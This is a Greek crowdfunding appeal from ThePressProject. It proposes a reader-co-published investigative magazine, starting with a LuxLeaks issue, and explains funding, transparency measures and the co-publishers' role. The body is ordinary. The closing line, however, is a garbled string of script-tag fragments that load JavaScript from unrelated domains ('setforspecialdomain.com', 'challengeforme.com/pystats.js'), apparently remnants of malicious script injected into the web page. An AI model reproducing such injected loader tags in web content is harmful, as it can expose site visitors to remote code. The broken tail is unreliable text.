Μαζί να αλλάξουμε το τοπίο της ενημέρωσης – Η πρόταση της επόμενης ημέρας…Κώστας Εφήμερος

Παρά την προσπάθεια των κατεστημένων ΜΜΕ να μην ακουστούν τα ονόματα της Eurobank, της Wind, της Coca Cola, του Λάτση, του Δασκαλόπουλου και των άλλων εμπλεκομένων στο σκάνδαλο LUXLEAKS, με τη δική σας συνεισφορά σε λίγες ημέρες θα βρίσκεται στα περίπτερα ένα ερευνητικό τεύχος διαφορετικό απ΄ ότι άλλο έχει κυκλοφορήσει μέχρι σήμερα.

Το ThePressProject δημιουργήθηκε για να διερευνήσει τη νέα δημοσιογραφία των πολιτών αλλά και τη νέα πολιτεία των δημοσιογράφων και νιώθουμε ότι αυτή τη φορά συμμετέχουμε στην αλλαγή του σκηνικού της δημοσιογραφίας στην χώρα μας. Αυτό το 1o τεύχος, υπό την ονομασία TheMagazineProject – LUXLEAKS+, είναι από κάθε πλευρά ιστορικό. Για πρώτη φορά ο αναγνώστης παίρνει τα μέσα ενημέρωσης στα χέρια του και προασπίζεται τα συμφέροντά του.

Το TPP είχε την τύχη και την τιμή να λάβει μέρος σε μερικά από τα πιο ελπιδοφόρα εγχειρήματα στη σύγχρονη ιστορία του Τύπου. Να συμμετάσχει στην παραγωγή του ντοκιμαντέρ Debtocracy και να αναμεταδώσει το σήμα της ΕΡΤ όταν η κυβέρνηση έριξε το μαύρο. Και στις δύο αυτές περιπτώσεις είχαμε στο πλευρό μας τον πολίτη. Ξέρουμε ήδη λοιπόν ότι και αυτή τη φορά ο κόσμος είναι αυτός που θα βγάλει ασπροπρόσωπη τη δοκιμαζόμενη δημοσιογραφία.

Μήπως ήρθε η ώρα όμως να κάνουμε το επόμενο βήμα; Να φύγουμε από το περιθώριο της ατζέντας τους και να την επαναδιατυπώσουμε όλοι μαζί;

Το TMP δημιουργήθηκε στη βάση του crowdfunding. Οι συνεκδότες μας έχουν ήδη καλύψει τα έξοδα του τυπογραφείου, και αυτά είναι τα μόνα που τους ζητήσαμε. Το ThePressProject από τη μεριά του προσφέρει τη δημοσιογραφική έρευνα και το κόστος σχεδιασμού / ανάπτυξης του περιοδικού. Επειδή σεβόμαστε τα χρήματα που ήρθαν από το υστέρημα των πολιτών αποφασίσαμε ότι το περιοδικό, αφού πρώτα μείνει για μερικές ημέρες στα περίπτερα, πρέπει να διανεμηθεί σε όλο του το τιράζ εντελώς δωρεάν. Έτσι, όποιος θέλει να επιβραβεύσει το έργο του TPP θα μπορεί να το κάνει στο περίπτερο, γνωρίζοντας ωστόσο ότι σε κάθε περίπτωση το μήνυμα θα φτάσει παντού.

Ξέρουμε ότι το περιοδικό έχει ήδη ενοχλήσει. Θέλουμε όμως να σας προτείνουμε να γίνει ακόμα πιο ενοχλητικό. Προτείνουμε να μη σταματήσουμε εδώ, όσο ακόμα υπάρχουν τόσα πολλά που δεν έχει τολμήσει να πει κανείς.

Να μη γίνει για μία μόνο φορά!

Αν συνεχίσετε να ενισχύετε το TMP (κλικ εδώ ), μπορούμε να προχωρήσουμε και σε άλλες εκδόσεις με το ίδιο σκεπτικό: Μονοθεματικές έρευνες σε βάθος, χωρίς φόβο και με τεκμηρίωση για θέματα που σταματάνε εξαιτίας της ομερτά των ΜΜΕ. Το ρεπορτάζ θα δημοσιεύεται πάντα πρώτα στο TPP και μόνο εφόσον κρίνετε ότι πρέπει να φτάσει σε αυτούς που δεν χρησιμοποιούν το διαδίκτυο για την ενημέρωσή τους θα τυπώνεται σε ένα περιοδικό «ειδικού σκοπού». Οι συνεκδότες θα αποφασίζουν για τα θέματα βάσει των προτάσεων της συντακτικής μας ομάδας. Για παράδειγμα, αρχικά θα σας προτείναμε την έκδοση ενός περιοδικού με το γενικό τίτλο «Οι ολιγάρχες παίζουν μπάλα», για τους κυρίους Μαρινάκη, Αλαφούζο, Μελισσανίδη, Κόκκαλη, Σαββίδη κ.λπ. Για τα γήπεδα και όσα κρύβονται πίσω απ’ αυτά, για την εκμετάλλευση του οπαδικού αισθήματος για πολιτικά, νομικά ή οικονομικά παιχνίδια. Για τις φορολογικές και εταιρικές κομπίνες, για τα στημένα και την «οικονομία της μπάλας». Για όλ’ αυτά δηλαδή που δεν έχετε διαβάσει ποτέ ολοκληρωμένα.

Θα ξέρετε ότι θα τα πούμε όλα

Το ρεπορτάζ θα δημοσιεύεται πάντα πρώτα στο ThePressProject. Έτσι, θα μπορείτε να δείτε αν η έρευνά μας είναι αμερόληπτη και σε βάθος. Όπως και τώρα, όλοι οι συνεκδότες θα έχουν τη δυνατότητα να αποσυρθούν και να λάβουν πίσω τα χρήματά τους αν νιώθουν ότι δεν σταθήκαμε στο ύψος των προσδοκιών τους.

Θα χρειάζονται κάθε φορά 4.700€;

Ναι, αλλά στόχος μας είναι μέσω των διαφημίσεων, της συνεισφοράς των «συνμεγαλοεκδοτών» και της εσωτερικής χρηματοδότησης (μέρος των εσόδων του περιοδικού από το περίπτερο θα μεταφέρεται στην επόμενη έκδοση – βλέπε παρακάτω) να χρειαζόμαστε όλο και περισσότερους συνεκδότες που θα προσφέρουν όλο και μικρότερα ποσά. Αν το εγχείρημα στεφθεί με επιτυχία, οι συνεκδότες θα χρειάζεται να βάλουν μόνο 1 ευρώ ο καθένας για ένα περιοδικό που θα στοιχίζει 2,5 ευρώ στο περίπτερο.

Πόσα θα βγάζει το TPP;

Δεν μπορούμε να γνωρίζουμε σε ποιο ποσοστό θα αγοραστεί το TMP από τα περίπτερα. Άλλωστε, όλοι θα γνωρίζουν εκ των προτέρων ότι αν θέλουν θα μπορούν να το πάρουν δωρεάν. Το TMP δημιουργείται με δύο σκοπούς: α) να μπορέσουν όλοι οι Έλληνες να έχουν πρόσβαση σε μια ερευνητική δουλειά που δεν θα περνούσε από κανένα άλλο κανάλι επικοινωνίας και β) να στηριχτεί το ίδιο το ThePressProject ώστε να καλύψει τα λειτουργικά του έξοδα.

Το TPP καταστατικά δεν δέχεται διαφημίσεις από τράπεζες και κράτος και όσοι το διαβάζετε γνωρίζετε ότι δεν παίρνει και από άλλες πηγές, αφού δεν έχουμε αφήσει ήσυχη εταιρεία που θα ήθελε να διαφημιστεί στις σελίδες μας. Ως εκ τούτου, όσοι αγοράζουν το περιοδικό από το περίπτερο θα προσφέρουν μεγάλη βοήθεια στο δημοσιογραφικό μας όραμα. Ωστόσο, ανάλογα με το ποσό που θα συγκεντρωθεί από τα περίπτερα, το TPP θα μεταφέρει ένα μέρος των εσόδων του στην έκδοση του επόμενου τεύχους. Επειδή δεν γνωρίζουμε ακόμα ποιο είναι αυτό το ποσό δεν μπορούμε να σας πούμε λεπτομέρειες, μπορούμε όμως να σας εγγυηθούμε το εξής: Θα δημοσιεύσουμε ανοιχτό ισολογισμό του πρώτου τεύχους και θα σας ενημερώσουμε για όλα με διαφάνεια και ειλικρίνεια. Θα θέσουμε σε ψηφοφορία την πρότασή μας για κατανομή των εσόδων και όλοι οι συνεκδότες θα έχουν λόγο. Άλλωστε, όπως έχουμε ξαναγράψει, αν οποιοδήποτε θεωρήσει ότι το TPP κάνει κακή χρήση της προσπάθειας θα μπορεί να αποχωρήσει αποσύροντας τα χρήματα που έχει καταθέσει, κι αυτό είναι για μας μια επιπλέον ευθύνη. Δεν σκοπεύουμε να υποτιμήσουμε την τεράστια σημασία του λόγου των συνεκδοτών μας.

Τι μέτρα διαφάνειας θα πάρει το TPP;

Προ της έκδοσης κάθε τεύχους θα γίνεται ανάρτηση (για το 1ο τεύχος υπάρχει ήδη αναρτημένη) στην ειδική πλατφόρμα επικοινωνίας των συνεκδοτών της αναλυτικής λίστας όλων των ποσών που συγκεντρώθηκαν. Για όλα τα ποσά άνω των 200 ευρώ η λίστα θα είναι ονομαστική. Για όλα τα ποσά κάτω των 200 ευρώ θα γίνεται ανάρτηση των ποσών και του χρόνου συνεισφοράς τους. Επιπλέον, το TPP θα δημοσιεύει στο «ημερολόγιο του εκδότη» όλα τα αποδεικτικά της έκδοσης (προσφορές, τιμολόγια, πληρωμές, απόδοση φόρων κ.λπ.). Φυσικά, στη σελίδα διαφάνειας θα δημοσιεύονται και τα στοιχεία από τις διανομές και τα έσοδα του περιοδικού από τα περίπτερα. Το TPP θα καλύπτει μόνο του τα έξοδα της δημοσιογραφικής έρευνας και μόνο για ειδικά τεύχη που έχουν εγκριθεί από τους συνεκδότες αν υπάρχει ανάγκη για μεγαλύτερα έξοδα (π.χ. εισιτήρια για ρεπορτάζ στο εξωτερικό) θα γίνεται αίτημα ειδικής χρηματοδότησης.

Ποιος είναι ο ρόλος του συνεκδότη;

Θέλουμε να φτιάξουμε μαζί τη νέα πολιτεία της δημοσιογραφίας. Αυτής που δεν μπερδεύει τα εμπορικά συμφέροντα και τις πολιτικές βλέψεις με την εκδοτική γραμμή. Οι εκδότες μας θα έχουν λόγο σε μια σειρά κρίσιμων ζητημάτων: Θα έχουν ενεργό ρόλο στην επιλογή του θέματος, θα έχουν πρόσβαση στα στοιχεία της έκδοσης, θα κάνουν παρατηρήσεις και προτάσεις για την ύλη αλλά δεν θα έχουν -όπως δεν θα έπρεπε να έχουν και οι παρόντες εκδότες- τη δυνατότητα να επεμβαίνουν στο δημοσιογραφικό αποτέλεσμα. Η παρουσία των συνεκδοτών και η δυνατότητα που θα έχουν να αποσυρθούν από την έκδοση είναι για μας η απόλυτη δικλείδα ασφαλείας και εγγύησης του καλύτερου δυνατού δημοσιογραφικού αποτελέσματος.

Ποιος είναι νομικά υπεύθυνος για το περιοδικό;

Τη νομική ευθύνη για το περιοδικό θα την αναλάβει ο εκδότης του ThePressProject. Οι συνεκδότες δεν θα έχουν καμία ευθύνη, αφού θα υπάρχει ειδικό νομικό κείμενο που ξεκαθαρίζει ότι ο ρόλος του συνεκδότη νομικά ισοδυναμεί με το ρόλο του συνδρομητή.

Γιατί πιστεύετε ότι θα πετύχει;

Γιατί οι εκδότες θα είστε εσείς, και όχι κάποιος που ισχυρίζεται ότι υπερασπίζεται τα συμφέροντά σας. Το περιοδικό θα μπορεί να βγαίνει και να φέρνει έσοδα μόνο όσο εσείς πιστεύετε ότι αξίζει τον κόπο. Δεν θα έχει κάποια αναγκαστική περιοδικότητα και θα εκδίδεται μόνο όταν υπάρχει ειδικός λόγος για να κυκλοφορήσει και μόνο κατόπιν της συμφωνίας των συνεκδοτών όποτε αυτοί αποφασίζουν ότι ένα τεύχος πρέπει να κυκλοφορήσει.

Γιατί να μην βγει ένα ερευνητικό περιοδικό γενικότερης ύλης;

Γιατί καλά περιοδικά υπάρχουν και σήμερα. Υπάρχουν εξαιρετικά αξιόλογες προσπάθειες σαν το Unfollow και το Hot Doc που αξίζουν. Το TMP δεν δημιουργήθηκε όμως για να διεκδικήσει κανένα μερίδιο της αγοράς. Στόχος του δεν είναι να μοιραστεί το περιεχόμενο της ιστοσελίδας μας σε ένα άλλο μέσο. Αντίθετα, σχεδιάστηκε για να αγοραστεί απ’ αυτούς που έχουν πρόσβαση στην πληροφορία και να γίνει δώρο σε αυτούς που δεν έχουν. Δεν αποτελεί ένα ακόμα χάρτινο περιοδικό. Είναι ένα εγχείρημα με ειδικό ξεκάθαρο σκοπό: Να σπάσει την ομερτά των ΜΜΕ για συγκεκριμένες πτυχές της ενημέρωσης και να μιλήσει ανοιχτά για όσα δεν τολομούν οι άλλοι.

Το TMP θα είναι δηλαδή ένα στρατευμένο περιοδικό;

Το TMP θα είναι -όπως και το TPP- στρατευμένο στην καλή δημοσιογραφία. Θα ερευνά τις πτυχές των υποθέσεων που δεν αγγίζουν τα άλλα ΜΜΕ και θα δημοσιεύει τα αποτελέσματα της έρευνας όποιος και αν εμπλέκεται στην αποκάλυψη. Όσοι ενημερώνονται από το ThePressProject γνωρίζουν ότι, αντίθετα με όσα ισχυρίζεται ο Γιώργος Μουρούτης, για μας δεν υπάρχει πολιτικό ή οικονομικό ταμπού.

Μπορούμε να το κάνουμε;

Αν μπορούμε λέει; Θα τους ενοχλήσουμε όσο δεν φαντάζεστε!

ThePressProject

 ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >